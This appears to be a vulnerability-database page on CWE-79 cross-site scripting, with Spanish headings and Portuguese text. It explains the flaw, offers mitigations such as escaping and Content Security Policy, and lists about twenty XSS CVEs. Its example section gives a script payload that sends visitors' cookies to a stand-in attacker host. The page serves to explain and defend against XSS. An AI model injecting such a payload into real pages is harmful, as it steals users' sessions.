Fallos del tipo CWE-79

28.947 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2017-20153LOWaerouk imageserve cross site scriptingEPSS 0.6%CVE-2022-1093—WP Meta SEO < 4.4.7 - Admin+ Stored Cross-Site Scripting via breadcrumbsEPSS 0.6%CVE-2023-2381LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2021-25005—SEUR Oficial < 1.7.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-28639MEDIUMGLPI vulnerable to reflected Cross-site Scripting in search pagesEPSS 0.6%CVE-2024-0591MEDIUMwpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin <= 3.4.2.2 - Reflected Cross-Site Scripting.EPSS 0.6%CVE-2023-2386LOWNetgear SRX5308 Web Management Interface cross site scriptingEPSS 0.6%CVE-2023-6303LOWCSZCMS Site Settings Page cross site scriptingEPSS 0.6%CVE-2023-3158HIGHMail Control <= 0.2.8 - Unauthenticated Stored Cross-Site Scripting via Email SubjectEPSS 0.6%CVE-2025-26791MEDIUMDOMPurify before 3.2.4 has an incorrect template literal regular expression, sometimes leading to mutation cross-site scripting (mXSS).EPSS 0.6%CVE-2014-3650—Multiple persistent cross-site scripting (XSS) flaws were found in the way Aerogear handled certain user-supplied content. A remote attackerEPSS 0.6%CVE-2021-24821—Cost Calculator < 1.6 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24817—Ultimate NoFollow <= 1.4.8 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-1851LOWSourceCodester Online Payroll System employee_add.php cross site scriptingEPSS 0.6%CVE-2023-3887LOWCampcodes Beauty Salon Management System search-appointment.php cross site scriptingEPSS 0.6%CVE-2023-2055LOWCampcodes Advanced Online Voting System config_save.php cross site scriptingEPSS 0.6%CVE-2022-22812—A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists that could cause a web sEPSS 0.6%CVE-2023-1746LOWDreamer CMS File Upload cross site scriptingEPSS 0.6%CVE-2021-24828—Mortgage Calculator / Loan Calculator < 1.5.17 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-0898—IgniteUp <= 3.4.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%